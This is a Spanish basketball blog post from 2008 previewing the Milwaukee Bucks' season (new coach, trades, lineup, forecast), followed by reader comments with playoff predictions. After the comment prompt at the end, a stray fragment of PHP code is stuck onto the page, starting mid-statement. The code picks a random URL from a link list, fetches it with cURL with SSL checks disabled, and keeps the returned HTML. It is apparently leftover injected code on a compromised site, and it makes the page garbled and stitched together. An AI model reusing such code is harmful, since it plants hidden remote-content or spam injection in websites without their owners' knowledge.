Milwaukee Bucks: Déjà Vu

23 de September de 2008 por txusma

Con sus decepcionantes actuaciones de las dos últimas temporadas, los Bucks se han ganado a pulso que no confiemos en ellos. Hace dos años las lesiones asolaron el equipo y afectaron en mayor o menor medida a todos los integrantes del teórico quinteto titular. Aquella temporada, que cerraron con un registro de 28 victorias y 54 derrotas, se consideró un accidente. Con el mismo bloque del año anterior y la incorporación vía draft del prometedor jugador chino Yi Jianlian los Bucks se volvían a presentar al inicio de la temporada pasada como claro aspirante a entrar en los Playoffs del Este. Nada más lejos de la realidad: Milwaukee acabó con 26 victorias, menos aún que el año anterior, permitieron nada menos que 104 puntos por partido y se disputaron con Miami el título de “Mayor decepción de la temporada”. Posiblemente uno de los grandes culpables de semejante fracaso fuera su entrenador, Larry Krystkowiak, que demostró muy poca capacidad para gestionar y exprimir debidamente su plantilla.Esta temporada se ha iniciado con cambios. John Hammond es el nuevo GM de la franquicia en sustitución de Larry Harris y su primera decisión ha sido la de prescindir de Krystowiak y contratar en su lugar a un Scott Skiles que fue despedido a mitad de la temporada pasada de los Chicago Bulls cuando el marcador de la franquicia de Illinois reflejaba un sorprendente 9-16, inaudito en una franquicia que la temporada anterior había causado tan buena impresión y que sonaba incluso para el anillo.

Pero no ha sido éste, ni mucho menos, el único cambio de la franquicia. A finales de junio Yi Jianlian y Bobby Simmons abandonaban la franquicia camino de New Jersey a cambio del veterano alero Richard Jefferson, y Maurice Williams hacía lo propio en un trade a tres bandas que acababa con Luke Ridnour en la capital de Wisconsin. En el draft, Hammond completaba la plantilla con Joe Alexander, atlético alero procedente de West Virginia, capaz de jugar también como PF, y Luc Mbah a Moute, jugador encargado de realizar gran parte del trabajo sucio en la UCLA de Kevin Love.

Así las cosas, la estrella continúa siendo Michael Redd, pero ya no es la estrella indiscutible. El año pasado su media de anotación bajó 4 puntos y durante el verano se oyeron los primeros rumores de traspaso y se dieron voz a las primeras dudas sobre su rendimiento. En todo caso Redd, medalla de oro en los JJ.OO. de Pequín, sigue siendo un anotador letal al que posiblemente le beneficiará más el estilo de juego de Luke Ridnour que el de su ex-compañero Mo Williams. Con nuevo entrenador, nuevo director de juego y nuevo escudero, Redd se enfrenta a la que puede ser la última oportunidad de demostrar que es el hombre adecuado para comandar la nave de vuelta a los Playoffs. Como ya hemos apuntado anteriormente a su lado se presentan el recién adquirido Richard Jefferson, jugador de talento que aportará intensidad defensiva y compromiso, acostumbrado a jugar como segunda espada, y el llamado a ser el tercer vértice del triángulo, el renovado Andrew Bogut, que año tras año mejora sus registros y que está llamado a ser uno de los grandes pívots del Este. Completando el quinteto aparecerá seguramente Charlie Villanueva, que después de un año de lesiones y otro en que fue relegado a la suplencia en favor de Yi Jianlian por causas ajenas al rendimiento deportivo, se encuentra sin más excusas para ofrecer todo el talento que atesora, aunque deberá esmerarse en el aspecto defensivo si quiere entrar de lleno en los planes de Skiles, y posiblemente un Luke Ridnour del que esperan que vuelva a ser el que tan buenas impresiones dejó en Seattle hace ya tres temporadas.

En el banco destacan jugadores como el ya mencionado Joe Alexander, que dará descanso tanto a Jefferson como a Villanueva, Charlie Bell, que de recuperar el nivel de hace dos temporadas se convertiría en un gran sexto hombre, Tyron Lue, jugador defensivo del tipo que le gustan a Skiles, y Ramon Sessions, que se encuentra en disposición de disputarle el puesto a Ridnour, viendo el gran estado de forma que demostró en el final de la temporada pasada, cuando promedió 11.5 puntos, 11 asistencias, 5 rebotes y 1.5 robos durante el mes de abril.

Con todos estos elementos los Bucks disponen nuevamente al inicio de la temporada de un quinteto inicial compensado y de gran calidad pero han perdido la poca profundidad de banquillo que poseían de manera que las lesiones pueden marcar definitivamente el rendimiento de la plantilla. Si no nos hubiéramos llevado los chascos que nos hemos llevado anteriormente apostaríamos a que está temporada será la de su retorno a los Playoffs, pero la experiencias nos hace ser precavidos y rebajar nuestras expectativas de manera considerable.

Quinteto: Luke Ridnour, Michael Redd, Richard Jefferson, Charlie Villanueva y Andrew Bogut

Sexto: Ramon Sessions

Pronóstico: Peleando por entrar en los Playoffs si no les castigan las lesiones.

Comenta

11 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    No creo que hayan solucionado muchas cosas con los movimientos de este verano. Jefferson mejora lo que había, por supuesto. Pero de Ridnour no me fío un pelo, y Villanueva promete pero de momento, con excusas o sin ellas, no ofrece demasiado. El banquillo es lamentable, y eso que me encantó lo que vi de Sessions y me gusta Charlie Bell.

    En el Oeste sería un equipo de lotería sin dudas. En el Este… pues sí, deberían luchar por meterse en Playoffs.

      Citar

  2. TheDeerHunter dice:
    #2

    En realidad a priori la base era más o menos buena para entrar en playoffs del este… y este año se ha tratado de reforzar, en principio con cierto buen criterio (la plantilla parece algo más compensada)

    No obstante a un equipo “decepción” le fichas a un entrenador “decepción” más algún que otro jugador “decepción”… suena tan mal esta combinación.
    Total para sudar sangre por entrar en playoffs.

    Veo difícil el asunto.
    Es un equipo que me inspira indiferencia… no sé porqué.

      Citar

  3. planetbasket.net dice:
    #3
  4. Viva_Dirk dice:
    #4

    No recuerdo ahora mismo si los he dado en play-offs, pero confío en que hagan un buen año, básicamente porque me gustan los jugadores que tienen, aunque eso ya pasaba el año pasado.

    Tanto Bogut como Villanueva tienen que renovar en el verano de 2009, y eso se notará en su rendimiento deportivo seguro, a parte de que son dos jugadores con tremendas posibilidades, en ellos esta la clave de la temporada de los Bucks. Con Bogut me mojo y digo que sera All-Star este año, y Villanueva depende de como se lleve desde el principio con Skiles, miedo me da.

    Redd y Jefferson son dos jugadores muy fiables en lo suyo, ahí ganan claramente con respecto al año pasado, y con Ridnour se deciden por un base muy pasador en contraposición con Williams, aunque tampoco parece ser de los que mas le gustan a Skiles.

    En el banco tanto Bell como Alexander deberían jugar bastante, y si Sessions es parecido a lo que acabo siendo el año pasado, un plus mas que tienen.

      Citar

  5. Jabho dice:
    #5

    Bueno, es que vienen de dos temporadas de menos de 30 victorias. Sino mejoran eso es pa´matarlos.

    Yo no les veo en play off. El Este ha mejorado y hay al menos 10 equipos con opciones. Pueden estar en este grupo pero como uno de los mas flojos.

    Villanueba es un de los que podría dar un salto de calidad al equipo. Bogut el otro. Les falta dureza en el juego interior y mejorar la dirección de juego…

    Haran una temporada mejor, eso es fácil, pero dudo que lleguen al 50% de victorias y si cogen PO será mas por demeritos de otros, me temo.

      Citar

  6. Kalashnikov dice:
    #6

    Joder, pues equipo tienen. Jefferson y Redd podrían ser allstar con un año bueno, Bogut fue nº1 de su draft si no estoy muy equivocado, Charlie no lleva dos años excesivamente buenos, pero en su año de rooky la rompió y parecía que iba a ser el nuevo kareem. Evidentemente tanto no, pero bueno, me entendeis 😛

    Los veo más justos en la posición de base. Ridnour no es un base titular en la NBA, si no lo fue en seattle no creo que lo sea en ningún sitio, Sessions le va a comer el puesto fijo, para mi es de los grandes tapados entre los bases jóvenes. Está claro que es difícil destacar en una generación con dos bases que dominan la NBA desde tan jóvenes como Paul y Williams.

      Citar

  7. Txusma dice:
    #7

    Yo veo a los Bucks por encima de Charlotte, New York, New Jersey e Indiana y al mismo nivel que Washington, Atlanta, Chicago y Toronto. Vamos que salen con muchas oportunidades de luchar por entrar en los Playoffs, pero a ver como casa Skiles con esta plantilla. Ahi puede estar el quid de la cuestion

      Citar

  8. Viva_Dirk dice:
    #8

    Yo la verdad es que creo que harán una buena temporada, pero si entran en play-offs los veo octavos, veo a 7 equipos por encima del resto, Celtics, Cavs, Pistons, Sixers, Magics, Raptors y Wizars, todos ellos tienen la base del año anterior que ya los hizo equipos de play-offs, y los que estuvieron en la parte baja del play-offs han recibido fuertes refuerzos(Brand, Jermaine, ¿Arenas?).

    Los veo peleando la 8ª plaza con Atlanta, Chicago e Indiana.

      Citar

  9. Jabho dice:
    #9

    Yo además de los que comenta Viva incluyo a los Heat como equipo de PO en el este. Y luego eso, Hawks, Bulls e Pacers o Buckus podrían entrar….

    Yo al nivel de Wizards y Raptors no les veo por ahora.

      Citar

  10. TheDeerHunter dice:
    #10

    Que conste en acta, por delante de ellos yo pondría:
    Celtics, Cavs, Pistons, Sixers, Magics, Raptors, Chicago, Hawks, Miami y si me apuras incluso Pacers.

    Los veo fuera y muy fuera… para que luego no haya agravios comparativos con respecto a ciertas predicciones mías.

      Citar

  11. Kantonyo dice:
    #11

    La incorporación de Jefferson es la única nota positiva que veo en Bucks este año.

    No me gusta nada el regalo que le han hecho a Cavs con Maurice Williams. Los Cavs no tenían posibilidades de hacerse con nada decente por sus altos salarios, y les ha caido del cielo el regalo de Bucks. Maurice es uno de los bases con más proyección y a cambio no ha venido nada que invite al optimismo.

    Tampoco entiendo mucho la elección en el puesto 8, de Joe Alexander, han dejado pasar jugadores de muy alto nivel. Si tenian pensado desprenderse de Williams, podrían haber elegido a Dj Augustin. Para reforzar su poste alto podrían haber traido a Brook Lopez, si buscaban escoltas incluso a Jerryd Bayless o a ala-pivots como Anthony Randolph ….

    Muy díficil que lleguen al final de la liga regular luchando por los puestos de Playoffs. Apuesto a que serán 12-15º de la Conferencia Este.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>